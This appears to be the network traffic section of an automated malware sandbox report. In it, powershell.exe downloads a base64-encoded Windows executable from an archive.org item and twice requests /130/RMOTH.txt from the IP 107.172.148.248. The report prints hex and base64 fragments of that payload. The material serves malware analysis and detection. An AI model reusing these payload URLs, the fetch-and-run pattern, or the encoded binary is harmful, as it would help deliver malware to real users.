                                              Oct 2, 2024 05:23:19.668489933 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.668499947 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.668520927 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.668541908 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.709955931 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.709974051 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.710119009 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.710143089 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.710181952 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.733807087 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.733824015 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.734039068 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.734061003 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.734152079 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.752804995 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.752823114 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.752938986 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.752962112 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.753114939 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.753139973 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.753196001 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.753196001 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.753211975 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.753222942 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.753248930 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.753488064 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.753504038 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.753563881 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.753571987 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.753607988 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754015923 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754034042 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754075050 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754082918 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754106045 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754137039 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754336119 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754354954 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754389048 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754396915 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754424095 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754446030 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754601955 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754620075 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754678965 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.754686117 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.754723072 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.796844006 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.796866894 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.796974897 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.796997070 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.797035933 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.820693970 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.820713997 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.820784092 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.820801020 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.820842981 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839771986 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839804888 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839880943 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839895964 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839931965 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839941025 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839947939 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839966059 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.839987040 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.839994907 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840018988 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840039015 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840471983 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840497017 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840542078 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840549946 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840586901 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840795994 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840812922 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840857983 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.840864897 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.840897083 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841085911 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841108084 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841154099 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841162920 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841192007 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841614008 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841634989 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841682911 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.841691971 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.841722012 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.883368015 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.883464098 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.883506060 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.883531094 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.883546114 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.883563995 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.907289028 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.907313108 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.907444000 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.907484055 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.907521009 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927023888 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927042007 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927145958 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927169085 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927202940 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927459955 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927474976 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927519083 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927526951 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927560091 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927793980 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927810907 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927848101 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927855968 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.927881002 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.927897930 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928277016 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928291082 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928354025 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928364038 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928394079 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928644896 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928659916 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928688049 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928694963 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.928716898 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.928735018 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.929044962 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.929061890 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.929094076 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.929100037 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.929126978 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.965979099 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.966067076 CEST44349705207.241.227.240192.168.2.11
                                              Oct 2, 2024 05:23:19.966079950 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.966114998 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:19.968612909 CEST49705443192.168.2.11207.241.227.240
                                              Oct 2, 2024 05:23:20.129364014 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:20.134154081 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:20.134238005 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:20.134309053 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:20.139081001 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.503258944 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.503371954 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.509891987 CEST4970680192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.510379076 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.514661074 CEST8049706107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.515144110 CEST8049712107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:23:41.515219927 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.515352964 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:23:41.520087957 CEST8049712107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:24:02.878681898 CEST8049712107.172.148.248192.168.2.11
                                              Oct 2, 2024 05:24:02.878756046 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:24:02.878839016 CEST4971280192.168.2.11107.172.148.248
                                              Oct 2, 2024 05:24:02.883606911 CEST8049712107.172.148.248192.168.2.11

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 2, 2024 05:23:16.925757885 CEST5634553192.168.2.111.1.1.1
                                              Oct 2, 2024 05:23:17.073657036 CEST53563451.1.1.1192.168.2.11
                                              Oct 2, 2024 05:23:45.364411116 CEST5358736162.159.36.2192.168.2.11
                                              Oct 2, 2024 05:23:45.864664078 CEST4966553192.168.2.111.1.1.1
                                              Oct 2, 2024 05:23:45.871864080 CEST53496651.1.1.1192.168.2.11

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 2, 2024 05:23:16.925757885 CEST192.168.2.111.1.1.10x1c0cStandard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                              Oct 2, 2024 05:23:45.864664078 CEST192.168.2.111.1.1.10xf00bStandard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 2, 2024 05:23:17.073657036 CEST1.1.1.1192.168.2.110x1c0cNo error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                              Oct 2, 2024 05:23:45.871864080 CEST1.1.1.1192.168.2.110xf00bName error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • ia600100.us.archive.org
                                              • 107.172.148.248

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1149706107.172.148.248807744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 2, 2024 05:23:20.134309053 CEST78OUTGET /130/RMOTH.txt HTTP/1.1
                                              Host: 107.172.148.248
                                              Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.1149712107.172.148.248807744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              Oct 2, 2024 05:23:41.515352964 CEST78OUTGET /130/RMOTH.txt HTTP/1.1
                                              Host: 107.172.148.248
                                              Connection: Keep-Alive


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.1149705207.241.227.2404437744C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-02 03:23:17 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                              Host: ia600100.us.archive.org
                                              Connection: Keep-Alive
                                              2024-10-02 03:23:17 UTC606INHTTP/1.1 200 OK
                                              Server: nginx/1.24.0 (Ubuntu)
                                              Date: Wed, 02 Oct 2024 03:23:17 GMT
                                              Content-Type: text/plain; charset=utf-8
                                              Content-Length: 2823512
                                              Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                              Connection: close
                                              ETag: "66e22cba-2b1558"
                                              Strict-Transport-Security: max-age=15724800
                                              Expires: Wed, 02 Oct 2024 09:23:17 GMT
                                              Cache-Control: max-age=21600
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                              Access-Control-Allow-Credentials: true
                                              Accept-Ranges: bytes
                                              2024-10-02 03:23:17 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                              Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
                                              2024-10-02 03:23:18 UTC16384INData Raw: 41 41 41 50 34 4d 45 77 42 46 41 67 41 41 41 41 55 41 41 41 41 31 41 41 41 41 4f 41 41 41 41 41 41 41 45 51 4d 52 46 78 45 49 63 35 73 46 41 41 5a 76 63 51 41 41 43 69 41 42 41 41 41 41 66 73 55 49 41 41 52 37 42 51 6b 41 42 44 6e 4a 2f 2f 2f 2f 4a 69 41 41 41 41 41 41 4f 4c 37 2f 2f 2f 38 41 41 4e 30 66 41 41 41 41 49 41 49 41 41 41 42 2b 78 51 67 41 42 48 73 53 43 51 41 45 4f 73 6e 36 2f 2f 38 6d 49 41 41 41 41 41 41 34 76 76 72 2f 2f 78 45 44 62 79 73 41 41 41 6f 57 50 6f 38 41 41 41 41 67 41 51 41 41 41 48 37 46 43 41 41 45 65 77 73 4a 41 41 51 36 6e 66 72 2f 2f 79 59 67 41 51 41 41 41 44 69 53 2b 76 2f 2f 45 67 63 6f 63 41 41 41 43 68 4d 49 49 41 55 41 41 41 42 2b 78 51 67 41 42 48 76 30 43 41 41 45 4f 6e 58 36 2f 2f 38 6d 49 41 59 41 41 41 41 34 61
                                              Data Ascii: AAAP4MEwBFAgAAAAUAAAA1AAAAOAAAAAAAEQMRFxEIc5sFAAZvcQAACiABAAAAfsUIAAR7BQkABDnJ////JiAAAAAAOL7///8AAN0fAAAAIAIAAAB+xQgABHsSCQAEOsn6//8mIAAAAAA4vvr//xEDbysAAAoWPo8AAAAgAQAAAH7FCAAEewsJAAQ6nfr//yYgAQAAADiS+v//EgcocAAAChMIIAUAAAB+xQgABHv0CAAEOnX6//8mIAYAAAA4a
                                              2024-10-02 03:23:18 UTC16384INData Raw: 2f 2f 2f 77 41 52 42 47 39 49 49 77 41 47 62 33 51 41 41 41 6f 54 42 53 41 46 41 41 41 41 4f 44 48 2f 2f 2f 38 41 4f 4e 73 41 41 41 41 67 43 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 4d 41 45 55 67 41 41 41 41 4f 51 49 41 41 47 34 43 41 41 42 61 41 51 41 41 66 51 41 41 41 4d 73 43 41 41 43 4d 41 51 41 41 46 41 45 41 41 4a 77 44 41 41 43 55 41 41 41 41 41 51 4d 41 41 4c 77 41 41 41 41 57 41 41 41 41 33 41 49 41 41 4d 63 42 41 41 43 6a 41 51 41 41 53 67 49 41 41 41 55 41 41 41 43 62 41 67 41 41 58 67 41 41 41 49 45 42 41 41 41 38 41 51 41 41 61 77 45 41 41 42 30 44 41 41 44 38 41 41 41 41 66 77 49 41 41 4f 30 42 41 41 44 68 41 41 41 41 53 77 45 41 41 44 51 41 41 41 42 46 41 41 41 41 49 51 41 41 41 42 4d 43 41 41 41 34 4e 41 49 41 41 42 45 49 4f 6a 30 44 41
                                              Data Ascii: ///wARBG9IIwAGb3QAAAoTBSAFAAAAODH///8AONsAAAAgCAAAADgEAAAA/gwMAEUgAAAAOQIAAG4CAABaAQAAfQAAAMsCAACMAQAAFAEAAJwDAACUAAAAAQMAALwAAAAWAAAA3AIAAMcBAACjAQAASgIAAAUAAACbAgAAXgAAAIEBAAA8AQAAawEAAB0DAAD8AAAAfwIAAO0BAADhAAAASwEAADQAAABFAAAAIQAAABMCAAA4NAIAABEIOj0DA
                                              2024-10-02 03:23:18 UTC16384INData Raw: 38 52 43 53 68 31 41 67 41 47 62 7a 49 6a 41 41 59 52 43 57 2f 47 49 67 41 47 4b 48 59 43 41 41 5a 76 4d 69 4d 41 42 69 68 30 41 67 41 47 45 77 38 67 43 51 41 41 41 48 37 46 43 41 41 45 65 38 49 49 41 41 51 36 7a 50 37 2f 2f 79 59 67 44 51 41 41 41 44 6a 42 2f 76 2f 2f 45 51 49 54 41 79 41 49 41 41 41 41 2f 67 34 4b 41 44 69 72 2f 76 2f 2f 4f 42 73 42 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 37 4d 49 41 41 51 36 6c 76 37 2f 2f 79 59 67 41 41 41 41 41 44 69 4c 2f 76 2f 2f 45 51 45 67 70 30 47 63 33 79 41 44 41 41 41 41 59 79 42 63 44 35 4f 49 59 58 37 46 43 41 41 45 65 38 51 49 41 41 52 68 4b 46 51 43 41 41 59 6f 59 77 49 41 42 68 4d 43 49 42 34 41 41 41 41 34 56 2f 37 2f 2f 78 45 48 4f 6c 6f 42 41 41 41 67 43 67 41 41 41 48 37 46 43 41 41 45 65
                                              Data Ascii: 8RCSh1AgAGbzIjAAYRCW/GIgAGKHYCAAZvMiMABih0AgAGEw8gCQAAAH7FCAAEe8IIAAQ6zP7//yYgDQAAADjB/v//EQITAyAIAAAA/g4KADir/v//OBsBAAAgAAAAAH7FCAAEe7MIAAQ6lv7//yYgAAAAADiL/v//EQEgp0Gc3yADAAAAYyBcD5OIYX7FCAAEe8QIAARhKFQCAAYoYwIABhMCIB4AAAA4V/7//xEHOloBAAAgCgAAAH7FCAAEe
                                              2024-10-02 03:23:18 UTC16384INData Raw: 41 41 4f 4d 37 38 2f 2f 38 52 41 54 6b 71 2f 66 2f 2f 49 41 63 41 41 41 42 2b 78 51 67 41 42 48 76 6b 43 41 41 45 4f 72 50 38 2f 2f 38 6d 49 41 49 41 41 41 41 34 71 50 7a 2f 2f 77 41 41 41 52 41 41 41 41 49 41 71 77 44 35 70 41 46 33 41 41 41 41 41 43 5a 2b 6f 51 41 41 42 42 54 2b 41 53 6f 41 41 42 70 2b 6f 51 41 41 42 43 6f 41 4b 76 34 4a 41 41 42 76 5a 51 41 41 43 69 6f 41 4b 76 34 4a 41 41 42 76 54 51 41 41 43 69 6f 41 4c 67 44 2b 43 51 41 41 4b 50 77 6c 41 41 59 71 4c 67 44 2b 43 51 41 41 4b 4c 45 45 41 41 59 71 4b 76 34 4a 41 41 42 76 2b 51 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 2b 41 49 41 42 69 6f 41 4b 76 34 4a 41 41 42 76 45 43 4d 41 42 69 6f 41 4c 67 44 2b 43 51 41 41 4b 43 55 42 41 41 6f 71 48 67 41 6f 73 41 51 41 42 69 70 4b 2f 67 6b 41 41
                                              Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                              2024-10-02 03:23:18 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                              Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                              2024-10-02 03:23:18 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                              Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                              2024-10-02 03:23:18 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
